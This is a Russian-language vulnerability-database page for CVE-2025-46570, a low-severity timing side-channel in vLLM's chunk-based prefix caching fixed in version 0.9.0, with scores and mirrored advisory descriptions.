Логотип exploitDog
Консоль
Логотип exploitDog

exploitDog

debian логотип

CVE-2025-46570

Опубликовано: 29 мая 2025
Источник: debian
EPSS Низкий

Описание

vLLM is an inference and serving engine for large language models (LLMs). Prior to version 0.9.0, when a new prompt is processed, if the PageAttention mechanism finds a matching prefix chunk, the prefill process speeds up, which is reflected in the TTFT (Time to First Token). These timing differences caused by matching chunks are significant enough to be recognized and exploited. This issue has been patched in version 0.9.0.

Пакеты

ПакетСтатусВерсия исправленияРелизТип
vllmitppackage

EPSS

Процентиль: 9%
0.00036
Низкий

Связанные уязвимости

CVSS3: 2.6
redhat
3 месяца назад

vLLM is an inference and serving engine for large language models (LLMs). Prior to version 0.9.0, when a new prompt is processed, if the PageAttention mechanism finds a matching prefix chunk, the prefill process speeds up, which is reflected in the TTFT (Time to First Token). These timing differences caused by matching chunks are significant enough to be recognized and exploited. This issue has been patched in version 0.9.0.

CVSS3: 2.6
nvd
3 месяца назад

vLLM is an inference and serving engine for large language models (LLMs). Prior to version 0.9.0, when a new prompt is processed, if the PageAttention mechanism finds a matching prefix chunk, the prefill process speeds up, which is reflected in the TTFT (Time to First Token). These timing differences caused by matching chunks are significant enough to be recognized and exploited. This issue has been patched in version 0.9.0.

CVSS3: 2.6
github
3 месяца назад

Potential Timing Side-Channel Vulnerability in vLLM’s Chunk-Based Prefix Caching

EPSS

Процентиль: 9%
0.00036
Низкий